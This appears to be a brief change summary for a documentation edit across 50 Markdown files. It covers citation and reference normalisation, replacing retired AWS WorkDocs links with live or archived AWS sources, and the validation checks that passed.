- Normalizes numbered References sections and linked superscript citations.
- Keeps the training banner as the final nonblank line after References.
- Preserves prior bibliography URLs and removes no acceptable existing references.
- Excludes hackingthe.cloud and validates citation targets, reference numbering, duplicate URLs, duplicate prose, assigned-file scope, and git diff integrity.
- Replaces newly added retired WorkDocs documentation URLs with live official AWS CLI/SDK or archived AWS documentation repository sources.

Validation: 50 assigned Markdown files; structural validator passed; git diff --check passed.